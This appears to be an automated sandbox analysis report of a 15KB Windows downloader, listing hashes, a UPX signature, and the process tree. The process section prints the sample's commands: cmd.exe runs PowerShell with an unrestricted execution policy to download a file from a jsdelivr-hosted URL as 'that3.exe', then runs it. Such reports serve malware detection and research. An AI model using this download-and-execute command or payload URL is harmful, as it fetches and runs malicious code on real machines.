Analysis
-
max time kernel
95s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19/11/2024, 19:05
Behavioral task
behavioral1
Sample
af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe
Resource
win7-20240903-en
General
-
Target
af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe
-
Size
15KB
-
MD5
fccd81097ec5a4c880aafd0fc504afe3
-
SHA1
9443fc2d9a7a4a0bcdd9920fa3be1279e21b0011
-
SHA256
af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a
-
SHA512
9c0d80699824746c738b1dc1e9d7f0dab2c0386d652c6f5054301cfa24ca3da82ac3046b5890599c34679df25252c233d41e4da559f8cdfb8b823d47f42030d0
-
SSDEEP
384:6PQ3CoT+Vl1gunfFASOh8sIGUbmeuAcRdThoo:6P886Mt0h8sIt8z1
Malware Config
Extracted
https://cdn.jsdelivr.net/gh/i87924hgasdhg/hgytiryty/bboxfull
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 4924 powershell.exe -
pid Process 4924 powershell.exe -
resource yara_rule behavioral2/memory/3292-0-0x0000000000400000-0x000000000040E000-memory.dmp upx behavioral2/memory/3292-17-0x0000000000400000-0x000000000040E000-memory.dmp upx behavioral2/memory/3292-20-0x0000000000400000-0x000000000040E000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4924 powershell.exe 4924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4924 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3292 wrote to memory of 908 3292 af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe 84 PID 3292 wrote to memory of 908 3292 af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe 84 PID 908 wrote to memory of 4924 908 cmd.exe 85 PID 908 wrote to memory of 4924 908 cmd.exe 85 PID 3292 wrote to memory of 4164 3292 af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe 90 PID 3292 wrote to memory of 4164 3292 af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe"C:\Users\Admin\AppData\Local\Temp\af70aef3c82e00c84250dd33d47109448867293a541d7dab35656264353d447a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://cdn.jsdelivr.net/gh/i87924hgasdhg/hgytiryty/bboxfull', 'that3.exe')2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://cdn.jsdelivr.net/gh/i87924hgasdhg/hgytiryty/bboxfull', 'that3.exe')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c that3.exe2⤵PID:4164
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82